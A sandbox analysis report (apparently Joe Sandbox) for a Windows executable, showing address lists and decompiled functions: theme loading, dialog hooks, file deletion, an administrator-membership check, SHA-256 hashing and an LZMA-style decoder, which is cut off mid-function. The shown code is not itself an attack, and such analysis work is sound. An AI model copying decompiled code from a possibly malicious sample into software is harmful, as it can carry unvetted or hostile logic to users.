0x00000000
0x00417b38
0x00000000
0x00000000
0x00417cad
0x00000000
0x00000000
0x00417cb2
0x00000000
0x00000000
0x00417cb7
0x00000000
0x00000000
0x00417bc0
0x00417bc7
0x00417bc9
0x00417bcc
0x00417bcf
0x00417bd7
0x00417bdc
0x00417bdf
0x00417be3
0x00417be8
0x00417beb
0x00417bee
0x00417bf0
0x00417bf3
0x00417bf3
0x00417bf6
0x00417bf9
0x00417bfc
0x00417bff
0x00417c02
0x00417c05
0x00417c07
0x00417c09
0x00417c11
0x00417c11
0x00417c14
0x00417c17
0x00417c1a
0x00417c1e
0x00417c1e
0x00417bf3
0x00417c23
0x00417c26
0x00417c2b
0x00417c2e
0x00417c33
0x00000000
0x00000000
0x00000000
0x00000000
0x00417c93
0x00417c99
0x00417c9c
0x00417ca3
0x00417baa
0x00417bb6
0x00000000
0x00000000
0x00417cbf
0x00417cc2
0x00417cc5
0x00417cc7
0x00417cce
0x00417cce
0x00417cd1
0x00417cd6
0x00417cd8
0x00417cda
0x00417cda
0x00417cde
0x00417ce2
0x00417ce5
0x00417cc9
0x00417cc9
0x00417ccc
0x00000000
0x00417cce
0x00417cce
0x00000000
0x00000000
0x00417cea
0x00000000
0x00000000
0x00000000
0x00417cec
0x00417cec
0x00417cef
0x00417cef
0x00417cf4
0x00417ccc
0x00417cc7
0x00417d06
0x00417d0c
0x00417d0c
0x00417d0f
0x00000000
0x00417d15
0x00417d18
0x00000000
0x00417d18
0x00000000
0x00000000
0x00417add
0x00417ac1
0x00417ac1
0x00417ac8
0x00000000
0x00000000
0x00000000
0x00000000
0x00417ac8
0x00417abf
0x00417a93
0x00417a93
0x00417a96
0x00000000
0x00000000
0x00000000
0x00000000
0x00417a96
0x00417a91
0x00000000
0x00417a8b
0x00417d36
0x00417d41
0x00417d44
0x00417d46
0x00417d46
0x00417d4b
0x00417d4e
0x00417d50
0x00417d52
0x00417d55
0x00417d58
0x00417d5a
0x00417d5a
0x00417d5e
0x00417d60
0x00417d60
0x00417d60
0x00417d60
0x00417d63
0x00417d64
0x00417d64
0x00417d5a
0x00417d69
0x00417d6c
0x00417d6f
0x00417d78
0x00417d78
0x00417d7a
0x00417d7d
0x00417d80
0x00417d83
0x00417d86
0x00417d89
0x00417d8f
0x00417d93
0x00417d98
0x00417d9b
0x00417d9e
0x00417da0
0x00417dd3
0x00417dd6
0x00417dd9
0x00417ddf
0x00417de2
0x00417de4
0x00417de4
0x00417de5
0x00417de8
0x00417deb
0x00417ded
0x00417df0
0x00417da2
0x00417da2
0x00417da5
0x00417da8
0x00417dae
0x00417db8
0x00417dbb
0x00417dc0
0x00417dc3
0x00417dc5
0x00417dcd
0x00417dcd
0x00417dd0
0x00417dd0
0x00417df3
0x00417df7
0x00417e02
0x00417e02
0x00417e07
0x00417e0d
0x00417e11
0x00417e11
0x00417d83
0x00417e1a
0x00417e1d
0x00417e22
0x00417e25
0x00417e2a
0x00417e2d
0x00417e32
0x00417e32
0x00000000
0x004179ec
0x00417924
0x00417924
0x00417926
0x00000000
0x00417928
0x00417928
0x0041792e
0x00417931
0x00417937
0x0041794d
0x00417952
0x00417957
0x0041796f
0x00417977
0x0041797d
0x00417982
0x00417982
0x00000000
0x00417959
0x0041795c
0x00417961
0x00417e61
0x00417e68
0x00417e68
0x00417957
0x00417926
0x00000000

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4693286797036fdb27d3e30d59c7620f526641804aeece5234ceefece6efafb3
Instruction ID: ebec2df155031d12abf2e074bfb409115379ff2ce8712d3ba73aff140c7f857e
Opcode Fuzzy Hash: 4693286797036fdb27d3e30d59c7620f526641804aeece5234ceefece6efafb3
Instruction Fuzzy Hash: 9B122871904248DFCF25DF69C9809ED7BF5BF48304F24816AF81687262DB39E985CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00407F31, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407F31(void* __ecx) {
				struct HINSTANCE__* _t2;
				struct HWND__* _t3;
				CHAR* _t11;
				void* _t13;
				struct HWND__* _t14;
				struct HWND__* _t16;

				_t13 = __ecx;
				_t2 = LoadLibraryA("uxtheme");
				if(_t2 != 0) {
					_t3 = GetProcAddress(_t2, "SetWindowTheme");
					_t16 = _t3;
					if(_t16 == 0) {
						L7:
						return _t3;
					}
					_t3 = GetWindow( *(_t13 + 4), 5);
					_t14 = _t3;
					if(_t14 == 0) {
						L6:
						goto L7;
					}
					_t11 = " ";
					do {
						_t16->i(_t14, _t11, _t11);
						_t3 = GetWindow(_t14, 2);
						_t14 = _t3;
					} while (_t14 != 0);
					goto L6;
				}
				return _t2;
			}

0x00407f37
0x00407f39
0x00407f41
0x00407f4a
0x00407f50
0x00407f54
0x00407f83
0x00000000
0x00407f83
0x00407f63
0x00407f65
0x00407f69
0x00407f82
0x00000000
0x00407f82
0x00407f6c
0x00407f71
0x00407f74
0x00407f79
0x00407f7b
0x00407f7d
0x00000000
0x00407f81
0x00407f85

APIs

LoadLibraryA.KERNEL32(uxtheme,?,00409204,000004B1,00000000,?,?,?,?,?,0040932F), ref: 00407F39
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407F4A
GetWindow.USER32(?,00000005), ref: 00407F63
GetWindow.USER32(00000000,00000002), ref: 00407F79

Strings

SetWindowTheme, xrefs: 00407F44
uxtheme, xrefs: 00407F32

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Window$AddressLibraryLoadProc
String ID: SetWindowTheme$uxtheme
API String ID: 324724604-1369271589
Opcode ID: bbf6c28a0305b89c0b96370cc3dca5fcce94809b387f971642420f3a6618e0a6
Instruction ID: 0bc065bbacf3197a1a27c387b1263c95b7af90742e8dbe1cc94099e7c33b47a7
Opcode Fuzzy Hash: bbf6c28a0305b89c0b96370cc3dca5fcce94809b387f971642420f3a6618e0a6
Instruction Fuzzy Hash: 7AF0A732F4A72633C232176A6C48F9B6A5CDF46B61B054176FD04F7281DA6DEC4041EE

Uniqueness

Uniqueness Score: -1.00%

Function 00408E84, Relevance: 7.5, APIs: 5, Instructions: 47
threadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00408E84(void* __ecx, void* __edx) {
				char _v16;
				short _v528;
				void* _t23;
				WCHAR* _t42;
				void* _t50;
				void* _t51;
				long _t63;

				_t38 = __ecx;
				_t50 = __ecx;
				 *((intOrPtr*)(__ecx + 0x48)) =  *((intOrPtr*)(__ecx + 0x48)) - 1;
				_t63 =  *0x41e8b8; // 0x0
				if(_t63 == 0) {
					__eax = GetCurrentThreadId();
					 *0x41e8b8 = __eax;
				}
				__eflags =  *0x41e8bc; // 0x0
				if(__eflags == 0) {
					 *0x41e8bc = SetWindowsHookExW(2, E00408E56, 0, GetCurrentThreadId());
				}
				__eflags =  *(_t50 + 0x48);
				if( *(_t50 + 0x48) != 0) {
					_t38 = _t50;
					_pop(_t50);
					_pop(0);
					_push(0);
					_push(_t50);
					_t51 = _t38;
					E00411BBA( &_v16, _t51 + 0x3c);
					if( *((intOrPtr*)(_t51 + 0x48)) > 0) {
						_t42 = 0x1d;
						wsprintfW( &_v528, L" (%d%s)",  *((intOrPtr*)(_t51 + 0x48)), E00403DC8(_t42));
						E00411CA3( &_v16,  &_v528);
					}
					_t23 = E00407A0F(GetDlgItem( *(_t51 + 4),  *(_t51 + 0x4c)), _v16);
					_push(_v16);
					L004191B0();
					return _t23;
				} else {
					 *0x41e8c0 = 1;
					__eflags =  *((intOrPtr*)(_t50 + 0x4c)) - 0x4b4;
					_t17 =  *((intOrPtr*)(_t50 + 0x4c)) != 0x4b4;
					__eflags = _t17;
					return EndDialog( *(_t50 + 4), 0 | _t17);
				}
			}

0x00408e84
0x00408e8d
0x00408e8f
0x00408e9b
0x00408ea1
0x00408ea3
0x00408eb0
0x00408eb0
0x00408eb5
0x00408ebb
0x00408eca
0x00408eca
0x00408ecf
0x00408ed2
0x00408efa
0x00408efc
0x00408efd
0x0040842d
0x00408436
0x00408437
0x00408440
0x00408449
0x0040844d
0x00408463
0x00408476
0x00408476
0x0040848e
0x00408493
0x00408496
0x0040849e
0x00408ed4
0x00408ed6
0x00408ee0
0x00408ee7
0x00408ee7
0x00408ef8
0x00408ef8

APIs

GetCurrentThreadId.KERNEL32 ref: 00408EA3
SetWindowsHookExW.USER32(00000007,Function_00008DCA,00000000,00000000), ref: 00408EAE
GetCurrentThreadId.KERNEL32 ref: 00408EBD
SetWindowsHookExW.USER32(00000002,Function_00008E56,00000000,00000000), ref: 00408EC8
EndDialog.USER32(?,00000000), ref: 00408EEE

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: CurrentHookThreadWindows$Dialog
String ID:
API String ID: 1967849563-0
Opcode ID: 3691de3e333e7b092baece99aba207316cf4cb990635e7b2a6dbd410fbca133d
Instruction ID: cda5ca9ca78aa2d930f050b6f2645aeb07f6ea8f0f9f92c422e756f156d8528b
Opcode Fuzzy Hash: 3691de3e333e7b092baece99aba207316cf4cb990635e7b2a6dbd410fbca133d
Instruction Fuzzy Hash: 7F01ADB1600228DFE2107F5BEC44AB2F7ECEB55362B11803FE645D21E1CBB658409B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040352A, Relevance: 6.0, APIs: 4, Instructions: 35
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040352A(WCHAR* __ecx) {
				struct _WIN32_FIND_DATAW _v596;
				void* _t5;
				int _t10;
				void* _t15;
				WCHAR* _t16;

				_t16 = __ecx;
				if( *0x41e8d8 == 0) {
					_t5 = FindFirstFileW(__ecx,  &_v596);
					__eflags = _t5 - 0xffffffff;
					if(_t5 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t5);
					__eflags = _v596.dwFileAttributes & 0x00000010;
					if(__eflags != 0) {
						return E0040340F(_t16, _t15, __eflags);
					}
					_t10 = SetFileAttributesW(_t16, 0);
					__eflags = _t10;
					if(_t10 == 0) {
						return 0;
					}
					return DeleteFileW(_t16);
				}
				L1:
				return 1;
			}

0x0040353b
0x0040353d
0x0040354c
0x00403552
0x00403555
0x00000000
0x00000000
0x00403558
0x0040355e
0x00403565
0x00000000
0x00403583
0x0040356a
0x00403570
0x00403572
0x00000000
0x0040357d
0x00000000
0x00403575
0x0040353f
0x00000000

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0040354C
FindClose.KERNEL32(00000000), ref: 00403558
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040356A
DeleteFileW.KERNEL32(?), ref: 00403575

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: File$Find$AttributesCloseDeleteFirst
String ID:
API String ID: 3319113142-0
Opcode ID: 6a61d0b2e63efd2324cefb0b8d0b17696f742564a21834292023f6db47524a43
Instruction ID: c6e9444eb262c84b595320cc7ffe2d3aedaf421e5fcd45af1c9d17f800727631
Opcode Fuzzy Hash: 6a61d0b2e63efd2324cefb0b8d0b17696f742564a21834292023f6db47524a43
Instruction Fuzzy Hash: 01F05E30901564B6DB212F315C48BAA3EACAF01327F54497AE842F11E0D7788B47869E

Uniqueness

Uniqueness Score: -1.00%

Function 00403FF2, Relevance: 4.5, APIs: 3, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00403FF2() {
				void* _v8;
				char _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;

				_v12 = 0;
				_v8 = 0;
				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8);
				if(_t13 != 0) {
					__imp__CheckTokenMembership(0, _v8,  &_v12);
					FreeSid(_v8);
					return _v12;
				}
				return _t13;
			}

0x00404012
0x00404015
0x00404018
0x0040401b
0x00404021
0x00404029
0x00404033
0x0040403c
0x00000000
0x00404042
0x00404047

APIs

AllocateAndInitializeSid.ADVAPI32(0040682B,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0041E7B8,0040682B), ref: 00404021
CheckTokenMembership.ADVAPI32(00000000,00000000,?), ref: 00404033
FreeSid.ADVAPI32(00000000), ref: 0040403C

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: b1a85781bd9880e8be0b06bd7447c5e118f4662a7265e0280068f0d854aaaee3
Instruction ID: 897e3d853c979f7ca1e9d36a2150445fe5287065c6dcae09f62a90d6d31b286d
Opcode Fuzzy Hash: b1a85781bd9880e8be0b06bd7447c5e118f4662a7265e0280068f0d854aaaee3
Instruction Fuzzy Hash: 35F0DAB5900208FBDB00DFD5DD89ADEBBBCFB08344F504469A605E2191D3709A149B15

Uniqueness

Uniqueness Score: -1.00%

Function 0040B440, Relevance: 4.0, APIs: 3, Instructions: 230
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E0040B440(intOrPtr* __ecx, void* __edx, int _a4) {
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				char _v104;
				intOrPtr* _v108;
				signed int _v112;
				void* _v116;
				signed int _v120;
				intOrPtr* _v124;
				int _t140;
				signed int _t142;
				signed int _t144;
				signed int _t148;
				void* _t155;
				intOrPtr* _t158;
				int _t177;
				intOrPtr* _t180;
				intOrPtr* _t184;
				intOrPtr* _t191;
				signed int _t205;
				signed int _t225;
				void* _t240;
				void* _t275;

				_t158 = __ecx;
				_t177 = _a4;
				_t222 = __edx;
				_v100 = __ecx;
				if(_t177 == 0) {
					L17:
					return _t140;
				} else {
					_t142 =  *(__ecx + 0x20) & 0x0000003f;
					 *(__ecx + 0x20) =  *(__ecx + 0x20) + _t177;
					asm("adc dword [ebx+0x24], 0x0");
					_t240 = 0x40 - _t142;
					if(0x40 <= _t177) {
						_a4 = _t177 - 0x40;
						memcpy(_t142 + __ecx + 0x28, __edx, 0x40);
						_t275 =  &_v124 + 0xc;
						_v116 = _t222 + _t240;
						while(1) {
							_t144 = 0;
							_t180 = _t158 + 0x30;
							do {
								asm("bswap edx");
								 *((intOrPtr*)(_t275 + 0x4c + _t144 * 4)) =  *((intOrPtr*)(_t180 - 8));
								asm("bswap edx");
								 *((intOrPtr*)(_t275 + 0x50 + _t144 * 4)) =  *((intOrPtr*)(_t180 - 4));
								asm("bswap edx");
								 *((intOrPtr*)(_t275 + 0x54 + _t144 * 4)) =  *_t180;
								asm("bswap edx");
								 *((intOrPtr*)(_t275 + 0x58 + _t144 * 4)) =  *((intOrPtr*)(_t180 + 4));
								_t144 = _t144 + 4;
								_t180 = _t180 + 0x10;
							} while (_t144 < 0x10);
							_v96 =  *_t158;
							_v92 =  *((intOrPtr*)(_t158 + 4));
							_v88 =  *((intOrPtr*)(_t158 + 8));
							_v84 =  *((intOrPtr*)(_t158 + 0xc));
							_v80 =  *((intOrPtr*)(_t158 + 0x10));
							_v76 =  *((intOrPtr*)(_t158 + 0x14));
							_t205 = 0;
							_v72 =  *((intOrPtr*)(_t158 + 0x18));
							_v68 =  *((intOrPtr*)(_t158 + 0x1c));
							_v120 = 0;
							do {
								_t225 = 1;
								_t184 =  &_v64;
								_v112 = 1;
								_t48 = _t225 - 5; // -4
								_t148 = _t48;
								_v108 = _t184;
								_v124 = 0x41c150 + _t205 * 4;
								_v104 = 0x10;
								do {
									if(_t205 != 0) {
										_t55 = _t225 - 3; // -2
										asm("ror ebx, 0x12");
										asm("ror ebp, 0x7");
										asm("ror esi, 0x13");
										asm("ror ebp, 0x11");
										 *_t184 =  *_t184 + ( *(_t275 + 0x4c + (_t225 & 0x0000000f) * 4) ^  *(_t275 + 0x4c + (_t225 & 0x0000000f) * 4) ^  *(_t275 + 0x4c + (_t225 & 0x0000000f) * 4) >> 0x00000003) + ( *(_t275 + 0x4c + (_t55 & 0x0000000f) * 4) ^  *(_t275 + 0x4c + (_t55 & 0x0000000f) * 4) ^  *(_t275 + 0x4c + (_t55 & 0x0000000f) * 4) >> 0x0000000a) +  *((intOrPtr*)(_t275 + 0x4c + (_t225 + 0xfffffff8 & 0x0000000f) * 4));
									}
									_t65 = _t148 + 2; // -2
									_t69 = _t148 + 3; // -1
									asm("ror ebx, 0x19");
									asm("ror ebp, 0xb");
									asm("ror ebp, 0x6");
									_t70 = _t148 + 1; // -3
									_t191 = _t275 + 0x2c + (_t69 & 0x00000007) * 4;
									 *_t191 =  *_t191 + (( *(_t275 + 0x2c + (_t70 & 0x00000007) * 4) ^  *(_t275 + 0x2c + (_t65 & 0x00000007) * 4)) &  *(_t275 + 0x2c + (_t148 & 0x00000007) * 4) ^  *(_t275 + 0x2c + (_t65 & 0x00000007) * 4)) + ( *(_t275 + 0x2c + (_t148 & 0x00000007) * 4) ^  *(_t275 + 0x2c + (_t148 & 0x00000007) * 4) ^  *(_t275 + 0x2c + (_t148 & 0x00000007) * 4)) +  *_t184 +  *_v124;
									_t78 = _t148 - 1; // -5
									 *((intOrPtr*)(_t275 + 0x2c + (_t78 & 0x00000007) * 4)) =  *((intOrPtr*)(_t275 + 0x2c + (_t78 & 0x00000007) * 4)) +  *_t191;
									_t88 = _t148 - 4; // -8
									_v124 = _v124 + 4;
									_t94 = _t148 - 3; // -7
									asm("ror edi, 0x16");
									asm("ror ebx, 0xd");
									asm("ror ebx, 0x2");
									_t98 = _t148 - 2; // -6
									_t205 = _v120;
									 *_t191 =  *_t191 + ( *(_t275 + 0x2c + (_t88 & 0x00000007) * 4) ^  *(_t275 + 0x2c + (_t88 & 0x00000007) * 4) ^  *(_t275 + 0x2c + (_t88 & 0x00000007) * 4)) + ( *(_t275 + 0x2c + (_t98 & 0x00000007) * 4) & ( *(_t275 + 0x2c + (_t94 & 0x00000007) * 4) |  *(_t275 + 0x2c + (_t88 & 0x00000007) * 4)) |  *(_t275 + 0x2c + (_t94 & 0x00000007) * 4) &  *(_t275 + 0x2c + (_t88 & 0x00000007) * 4));
									_t225 = _v112 + 1;
									_t184 = _v108 + 4;
									_t148 = _t148 - 1;
									_t105 =  &_v104;
									 *_t105 = _v104 - 1;
									_v112 = _t225;
									_v108 = _t184;
								} while ( *_t105 != 0);
								_t205 = _t205 + 0x10;
								_v120 = _t205;
							} while (_t205 < 0x40);
							_t158 = _v100;
							 *_t158 =  *_t158 + _v96;
							 *((intOrPtr*)(_t158 + 4)) =  *((intOrPtr*)(_t158 + 4)) + _v92;
							 *((intOrPtr*)(_t158 + 0xc)) =  *((intOrPtr*)(_t158 + 0xc)) + _v84;
							 *((intOrPtr*)(_t158 + 8)) =  *((intOrPtr*)(_t158 + 8)) + _v88;
							 *((intOrPtr*)(_t158 + 0x10)) =  *((intOrPtr*)(_t158 + 0x10)) + _v80;
							 *((intOrPtr*)(_t158 + 0x18)) =  *((intOrPtr*)(_t158 + 0x18)) + _v72;
							_t140 = _a4;
							 *((intOrPtr*)(_t158 + 0x14)) =  *((intOrPtr*)(_t158 + 0x14)) + _v76;
							 *((intOrPtr*)(_t158 + 0x1c)) =  *((intOrPtr*)(_t158 + 0x1c)) + _v68;
							if(_t140 >= 0x40) {
								_a4 = _t140 - 0x40;
								_t155 = memcpy(_t158 + 0x28, _v116, 0x10 << 2);
								_t275 = _t275 + 0xc;
								_v116 = _t155;
								continue;
							}
							if(_t140 != 0) {
								_t140 = memcpy(_t158 + 0x28, _v116, _t140);
							}
							goto L17;
						}
					} else {
						return memcpy(_t142 + __ecx + 0x28, __edx, _t177);
					}
				}
			}

0x0040b444
0x0040b446
0x0040b44e
0x0040b450
0x0040b456
0x0040b6e8
0x0040b6ed
0x0040b45c
0x0040b45f
0x0040b462
0x0040b46b
0x0040b46f
0x0040b473
0x0040b491
0x0040b49e
0x0040b4a3
0x0040b4a8
0x0040b4b0
0x0040b4b0
0x0040b4b2
0x0040b4b5
0x0040b4b8
0x0040b4ba
0x0040b4c1
0x0040b4c3
0x0040b4c9
0x0040b4cb
0x0040b4d2
0x0040b4d4
0x0040b4d8
0x0040b4db
0x0040b4de
0x0040b4eb
0x0040b4f2
0x0040b4f9
0x0040b500
0x0040b507
0x0040b50e
0x0040b512
0x0040b514
0x0040b518
0x0040b51c
0x0040b520
0x0040b520
0x0040b525
0x0040b530
0x0040b534
0x0040b534
0x0040b537
0x0040b53b
0x0040b53f
0x0040b547
0x0040b549
0x0040b558
0x0040b562
0x0040b565
0x0040b571
0x0040b576
0x0040b58c
0x0040b58c
0x0040b59b
0x0040b5a7
0x0040b5ad
0x0040b5b0
0x0040b5b7
0x0040b5be
0x0040b5d6
0x0040b5da
0x0040b5de
0x0040b5e4
0x0040b5ec
0x0040b5f6
0x0040b5fb
0x0040b607
0x0040b60c
0x0040b613
0x0040b618
0x0040b628
0x0040b632
0x0040b63c
0x0040b63d
0x0040b640
0x0040b641
0x0040b641
0x0040b645
0x0040b649
0x0040b649
0x0040b653
0x0040b656
0x0040b65a
0x0040b663
0x0040b66b
0x0040b671
0x0040b678
0x0040b687
0x0040b68a
0x0040b68d
0x0040b698
0x0040b69f
0x0040b6a2
0x0040b6a8
0x0040b6ad
0x0040b6c5
0x0040b6c5
0x0040b6c7
0x00000000
0x0040b6c7
0x0040b6d3
0x0040b6df
0x0040b6e4
0x00000000
0x0040b6e7
0x0040b475
0x0040b48a
0x0040b48a
0x0040b473

APIs

memcpy.MSVCRT ref: 0040B47C
memcpy.MSVCRT ref: 0040B49E

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: bc90ae24330184fdc1e542b8686ee53d0af4dcd7369474ae96014b3e614f3809
Instruction ID: 4ae693c08babda449d8f98831bc38807ceb3bc3cdeca2b2b28de7c60d0623c83
Opcode Fuzzy Hash: bc90ae24330184fdc1e542b8686ee53d0af4dcd7369474ae96014b3e614f3809
Instruction Fuzzy Hash: 9F916DB29043008FC318DF59D88498BB7E1FFC8314F1A8A6EE9489B355E375E955CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0040F320, Relevance: .5, Instructions: 481
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040F320(void* __eax, signed int* __ecx) {
				intOrPtr _t149;
				unsigned int _t153;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t160;
				signed int _t161;
				signed char* _t162;
				signed int _t164;
				signed int _t168;
				signed char* _t169;
				signed int _t171;
				signed char* _t179;
				signed int _t190;
				signed int _t192;
				signed int _t196;
				signed char* _t197;
				signed char* _t199;
				signed int _t204;
				signed short* _t205;
				void* _t206;
				signed int _t207;
				signed int _t215;
				signed int _t216;
				signed char* _t225;
				signed int _t228;
				signed int _t232;
				signed int _t235;
				signed int _t238;
				signed int _t241;
				signed int _t244;
				signed int _t247;
				signed char _t251;
				void* _t252;
				signed int _t265;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t278;
				signed char* _t279;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				unsigned int _t291;
				signed int* _t292;
				intOrPtr _t293;
				signed char* _t294;
				signed short* _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				signed int _t310;
				signed int _t314;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed char* _t344;
				void* _t351;

				_t292 = __ecx;
				_t340 =  *(__ecx + 0x34);
				_t283 =  *(__ecx + 0x1c);
				_t321 =  *(__ecx + 0x20);
				_t149 =  *((intOrPtr*)(__ecx + 0x10));
				 *(_t351 + 0x10) =  &(( *(_t351 + 0x28))[__eax]);
				 *((intOrPtr*)(_t351 + 0x14)) = _t149;
				_t204 = (0x00000001 <<  *(__ecx + 8)) - 0x00000001 &  *(__ecx + 0x2c);
				 *(_t351 + 0x18) =  *(_t149 + ((_t340 << 4) + 1) * 2) & 0x0000ffff;
				if(_t283 >= 0x1000000) {
					L4:
					_t153 = (_t283 >> 0xb) *  *(_t351 + 0x18);
					if(_t321 >= _t153) {
						_t293 =  *((intOrPtr*)(_t351 + 0x14));
						_t225 =  *(_t351 + 0x28);
						_t284 = _t283 - _t153;
						_t322 = _t321 - _t153;
						 *(_t351 + 0x18) =  *(_t293 + 0x180 + _t340 * 2) & 0x0000ffff;
						if(_t284 >= 0x1000000) {
							L39:
							_t157 = (_t284 >> 0xb) *  *(_t351 + 0x18);
							if(_t322 >= _t157) {
								_t285 = _t284 - _t157;
								_t323 = _t322 - _t157;
								_t158 =  *(_t293 + 0x198 + _t340 * 2) & 0x0000ffff;
								 *(_t351 + 0x1c) = 3;
								if(_t285 >= 0x1000000) {
									L44:
									_t228 = (_t285 >> 0xb) * _t158;
									_t159 =  *((intOrPtr*)(_t351 + 0x14));
									if(_t323 >= _t228) {
										_t294 =  *(_t351 + 0x28);
										_t286 = _t285 - _t228;
										_t324 = _t323 - _t228;
										 *(_t351 + 0x18) =  *(_t159 + 0x1b0 + _t340 * 2) & 0x0000ffff;
										if(_t286 >= 0x1000000) {
											L55:
											_t232 = (_t286 >> 0xb) *  *(_t351 + 0x18);
											if(_t324 >= _t232) {
												_t160 =  *(_t159 + 0x1c8 + _t340 * 2) & 0x0000ffff;
												_t287 = _t286 - _t232;
												_t323 = _t324 - _t232;
												if(_t287 >= 0x1000000) {
													L60:
													_t235 = (_t287 >> 0xb) * _t160;
													if(_t323 >= _t235) {
														goto L62;
													} else {
														_t288 = _t235;
													}
													goto L63;
												} else {
													if(_t294 >=  *(_t351 + 0x10)) {
														goto L2;
													} else {
														_t287 = _t287 << 8;
														_t323 = _t323 << 0x00000008 |  *_t294 & 0x000000ff;
														 *(_t351 + 0x28) =  &(_t294[1]);
														goto L60;
													}
												}
											} else {
												_t288 = _t232;
												goto L63;
											}
										} else {
											if(_t294 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t286 = _t286 << 8;
												_t324 = _t324 << 0x00000008 |  *_t294 & 0x000000ff;
												_t294 =  &(_t294[1]);
												 *(_t351 + 0x28) = _t294;
												goto L55;
											}
										}
									} else {
										_t314 =  *(_t159 + ((_t340 + 0xf << 4) + _t204) * 2) & 0x0000ffff;
										_t179 =  *(_t351 + 0x28);
										_t287 = _t228;
										if(_t228 >= 0x1000000) {
											L48:
											_t235 = (_t287 >> 0xb) * _t314;
											if(_t323 >= _t235) {
												L62:
												_t288 = _t287 - _t235;
